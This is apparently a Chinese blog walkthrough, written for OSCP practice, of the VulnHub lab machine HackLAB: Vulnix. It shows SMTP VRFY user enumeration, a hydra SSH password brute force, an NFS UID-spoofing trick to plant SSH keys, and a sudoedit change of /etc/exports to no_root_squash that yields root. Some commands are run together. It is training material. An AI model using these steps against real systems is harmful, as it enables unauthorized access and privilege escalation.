OSCP-vulnhub:HACKLAB: VULNIX靶机实战

最新推荐文章于 2024-06-12 08:52:50 发布
最新推荐文章于 2024-06-12 08:52:50 发布
阅读量399 收藏 1
点赞数
分类专栏: kali OSCP 文章标签: web安全 网络 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cjstang/article/details/131580330
版权
OSCP 同时被 2 个专栏收录
9 篇文章 0 订阅
订阅专栏
kali
5 篇文章 0 订阅
订阅专栏

---------------------------------------------------------------

本文题干阅读时间推荐15min,靶场练习推荐3h

----------------------------------------------------------------

 如果各位童鞋想讨论以下相关内容,欢迎关注公众号, 联系我:

  • OSCP相关技术备考中
  • CISSP备考经验已通过认证
  • CCSK(云安全)已通过认证
  • ISO/IEC 27001 Foundation已通过认证

----------------------------------------------------------------

一、前言

主要利用方式:

突破边界:VRFY探测smtp用户+hydra爆破用户名密码

突破边界:showmount远程挂载NFS,私钥登录边界用户

提权过程:sudo 超权编辑可挂载目录,私钥登录root用户

二、靶机信息

靶场: vulnhub.com

靶机名称: HackLAB:Vulnix

难度: 困难

发布时间: 2012910

下载地址:https://www.vulnhub.com/entry/hacklab-vulnix,48/

备注:涉及到VRFY、hydra、showmount、rsa密钥登录(坑有点大)

演练时间:2023-07-04

三、虚拟机配置

Vmware网络连接模式:NAT模式、DHCP服务:启用、IP地址:自动分配

攻击IP:192.168.169.198

靶机IP:192.168.169.202

四、信息收集

1、探测靶机ip地址

└─$ sudo arp-scan -I eth0-l

2探测靶机ip端口及端口具体服务

└─$ sudo nmap -p- 192.168.169.202

五、漏洞利用(突破边界)

3端口25开放,nc连接

└─$ nc -nv 192.168.169.20225

4VRFY探测用户

探测结果发现服务器没有禁用VRFY命令

VRFYvulnixVRFYvulnixs

5、可以通过工具枚举出smtp的用户名

smtp-user-enum:是kali自带的,使用Perl编写的工具

└─$ smtp-user-enum-M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192.168.169.202

6、finger命令查询用户信息

└─$ finger user@192.168.169.202

7、使用hydra爆破user账号

└─$ hydra -l user -P /usr/share/wordlists/rockyou.txt ssh://192.168.169.202 -t 4[22][ssh] host: 192.168.169.202   login: user   password: letmein

8、使用user账号登录靶机

9、尝试使用sudo提权,失败

10、目标还开放了2049端口(nfs网络文件系统)使用showmount输出网络文件,并挂载NFS

11、挂载后提示权限不够无法访问,查看/etc/passwd 确认用户vulnix的uid和gid都是2008

12、kali切换root权限创建vulnix账号

useraddvulnix -u 2008

13、切换vulnix账户后,进入/tmp/nfs目录下,里面就是一些隐藏的文件夹

└─# su vulnix $cd/tmp/mount$ls -la

14、root用户创建SSH证书(公私钥)(生成一直默认回车即可)

└─# ssh-keygen

15、切换vulnix用户,进入tmp/mnt 路径下创建 .ssh文件夹

将root/.ssh  id_rsa.pub 导入到 /tmp/mnt/.ssh 下面,并重命名为authorized_keys

root权限下,给id_rsa600权限

16、ssh连接

此处坑很大,一般ssh -I id_rsa 指令是连接不成功的,主要原因是openssh 版本的升级导致

提权

17、查看账户权限

vulnix@vulnix:~$ sudo -l

可以看到sudo提权,可以以root用户身份执行sudoedit /etc/exports,编辑/etc/exports该文件

vulnix@vulnix:~$ cat /etc/exportsvulnix@vulnix:~$ sudoedit /etc/exportsvulnix@vulnix:~$ cat /etc/exports

18、通过用no_root_squash替换root_squash来实,Ctrl+X 然后输入Y,回车保存退出

19VM重启机器后,使用showmount查看目标网络文件

20、创建mount目录用来挂载root

21、重启kali(原有的vulnix挂载要取消掉)再进行挂载root用户,挂载成功后进入验证

└─# mount -t nfs 192.168.169.202:/root /tmp/mount

22、以root用户在tmp目录下创建公私钥

└─# mkdir .ssh   └─# ls -la└─# ssh-keygen

23、靶机root目录下创建.ssh目录

24、从kali中生成root密钥拷贝到靶机的目录下

└─# cat /tmp/.ssh/id_rsa.pub > /tmp/mount/.ssh/authorized_keys

靶机验证生成

私钥赋权600

25、私钥连接靶机,成功登录,验证权限、路径以及获取root目录下的flag

└─# ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa'-i id_rsa root@192.168.169.202

-----------------------------------------------

靶场到此就结束啦,我们下期再见

--------------------------------------------------

cjstang
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
java红酒网站源码-OSCP-Survival:OSCP-生存
06-05
java网站源码OSCP-生存 这是一个克隆 这也可以查看 OSCP-生存指南 注意:本文档将目标 ip 称为导出变量 $ip。 要在命令行上设置此值,请使用以下语法: 出口ip=192.168.1.100 目录 卡利Linux 将目标 IP 地址设置为$...
OSCP-PWK:https
04-27
OSCP 提供了更好的阅读体验,因为回购协议大多类似于草稿和备份。 注释和备忘单位于Wiki页面中。 回购中充斥着TryHackMe编写的内容和二进制文件。 卡利配置 ohmyzsh + powerlevel10K + tmux Kali 2020.3的提示:...
Vulnhub靶机HackLAB_Vulnix
qq_48904485的博客
03-23 886
运行环境:Virtualbox(攻击机)和VMware(靶机)攻击机:kali(192.168.56.101)靶机HackLAB: Vulnix(192.168.56.110)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/hacklab-vulnix,48/
# 【oscp系列】靶机1
weixin_44807430的博客
01-15 785
快速打通靶机
Vulnhub-OSCP靶机实战
御七彩虹猫
05-10 2227
Vulnhub-OSCP靶机实战
oscp靶机教程
weixin_68723119的博客
08-13 306
1.使用命令 arp-scan -l 列出当前局域网的所有设备,在oscp网络适配器查看到的mac地址和扫描出来的192.168.211.141的MAC地址一致。先找一下有哪些我们可以利用的了,目前我们的用户是普通用户可以通过find命令找找一些特权命令,借助它可以从普通用户提升为root。找网站使用base64对内容进行解密,好家伙,是ssh连接私钥,找到宝了。只有一个用户“oscp”,要么它就是root,要么就是它是唯二用户。看到了bash,很亲切,去gtfobin搜索一下提权方法。
文件上传漏洞靶场-OSCP系列靶场过程
zkaqlaoniao的博客
10-08 382
当没有思路的时候,可以上传pspy64来尝试发现root下运行的进程没看够~?欢迎关注!
Vulnhub-靶机-HackLAB: Vulnix
qq_43264813的博客
03-05 1065
Vulnhub靶机HackLAB: Vulnix 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/hacklab-vulnix,48/ 文章目录Vulnhub靶机HackLAB: Vulnix一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址并对目标靶机进行全端口扫描: 【命令】nmap -n -sV -p- 192.168
Android官方建议关于Android APP UI界面设计的一些参考原则
一个IT人的技术成长历程。创造未来的行为就发生在今天,没有明天的目标,今天的行动就是重复昨天的事情。
01-16 1356
下面是来自于Android官网给出了关于Android APP UI界面设计的一些参考原则,希望对广大ui设计师能带来帮助,尤其是在进行Andriod相关界面设计的时候。   一、清晰是UI界面第一位,也是最重要的目标。   只有清楚的知道你设计的UI界面是什么,明白为什么要用它,理解界面是如何帮助他们交互的,预测用它会发生什么。人们才可能高效的利用它。模糊和迷惑的UI界面使得用户连疑问的...
java红酒网站源码-oscp-notes:oscp-notes
06-05
java网站源码OSCP - PWK(使用 Kali 进行渗透测试)注意事项 完成整个 OSCP 课程的完整 OSCP 笔记 目录 卡利Linux 将目标 IP 地址设置为$ip系统变量export ip=192.168.1.100 查找文件的位置locate sbd.exe 在$PATH...
Vulnix.7z靶机
04-25
一个vulnhub上的靶机,因为网络原因,下载的特别慢,我下载好,上传上来,供大家学习。如果大家有更好的靶机,请私我。
java红酒网站源码-OSCP-Notes:OSCP-笔记
06-05
java网站源码OSCP-笔记 卡利Linux 将目标 IP 地址设置为$ip系统变量export ip=192.168.1.100 查找文件的位置locate sbd.exe 在$PATH环境变量中搜索目录which sbd 查找名称中包含特定字符串的文件的搜索: find / -...
OSCP-Resources:有助于准备OSCP考试的资源集合
03-07
OSCP资源 有助于准备OSCP考试的资源的集合。 虚拟机/实验室环境 有大量的在线实验室环境可帮助您及时了解漏洞(新旧漏洞)。 HackTheBox -在线实验室环境- VulnHub -弱势虚拟机- TryHackMe -在线实验室环境- ...
OSCP靶机练习--CuteNews01
一杯咖啡的渗透记忆
05-19 1644
靶机地址:BBS (cute): 1.0.2 ~ VulnHub 靶机环境搭建: 个人本地环境:VMWare已经安装好了,因为虚拟机镜像是virtualBox的.vbox结尾,所以在本地又安装了VitualBox VMWare和VitualBox的NAT网络不能同时使用, 整了半天也没搞起来,后来才知道这两种虚拟程序不能同时使用NAT。 所以使用了另外一台Kali的机器,直接用主机来测了。靶机本地用VirtualBox安装靶机。 但因为不在同一台机器上面,所以才用的是桥接的方式链接,如下:
OSCP练习:vulhub靶机TR0LL 2攻略
weixin_47311099的博客
04-22 4318
信息收集 主机发现 先用namp做个扫描 在这里插入图片描述 发现21ftp、22ssh、80http 网站信息收集 访问web页面,跟上一关一样没啥东西 爆一下网站目录 发现robots文件中告诉我们一些路径,将其保存当作dirb字典在进行爆破 果然又发现了几个路径,但是所有页面都是同一个图…以及一句话… 但是!当我们把图片下载下来,算一下MD5就会发现/dont_bother里的图片MD5跟其他的不一样! 看一眼图片二进制发现重要信息,y0ur_self会是突破电 strings cat_t
Vulnhub靶机 Vuluix
菜浪马废的博客
04-14 229
发现25端口 nmap -sP 192.168.0.0/24 nmap -sV -A -O 192.168.0.136 对smtp进行枚举 apt-get install smtp-user-enum smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192....
渗透测试攻防练习实验室 (资源分享,国外在线教程)
热门推荐
关注互联网安全的小虾米一枚
07-26 2万+
Vulnerable Web Applications Vulnerable Web Applications BadStore http://www.badstore.net/ BodgeIt Store http://code.google.com/p/bodgeit/ Butterfly Security Project ht
vulhub上oscp InfoSec靶机渗透测试writeup
qq_44635376的博客
02-05 637
这里写目录标题信息搜集nmap搜集靶机信息访问80端口网站,探索网站信息阅读网页内容搜集到一个有效信息(这台主机的用户名是oscp)发现80端口下有/secret.txt文件,我们直接去访问看看,发现一串字符,这时候猜测应该是加密的什么重要内容,很兴奋。接下来我们要解密。这串加密像是base64加密,于是我在将密文下载到kali虚拟机中使用secret.txt命名。然后使用命令base64 -d secret.txt > private_key解密并将内容保存到private_key文件中,解密以后的
网络安全和信息安全
最新发布
waitaikong_的博客
06-12 1233
信息安全网络安全网络空间安全是当前信息技术领域内的三个重要概念,它们在某些方面有着紧密的联系,同时在不同的语境和应用场景下又有所区别。本次分析旨在深入理解这三个概念的定义、内涵及其相互关系,以便更好地应用于实际工作中。综上所述,信息安全网络安全网络空间安全是三个密切相关但又各具特色的概念。信息安全关注的是信息本身的保护,网络安全侧重于网络环境和设施的安全,而网络空间安全则是一个更全面的框架,它不仅包括了信息安全网络安全的内容,还延伸到了更广泛的社会和法律层面。
OSCP Like Vulns Machines.pdf
10-06
HackLAB: Vulnix提供了另一个平台,让学习者在真实的黑客环境中磨练技术。而/dev/random:scream则可能涉及到随机数据源的漏洞利用,显示了高级渗透测试者对操作系统底层机制的理解。pWnOS 2.0预览版则是更高级别的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值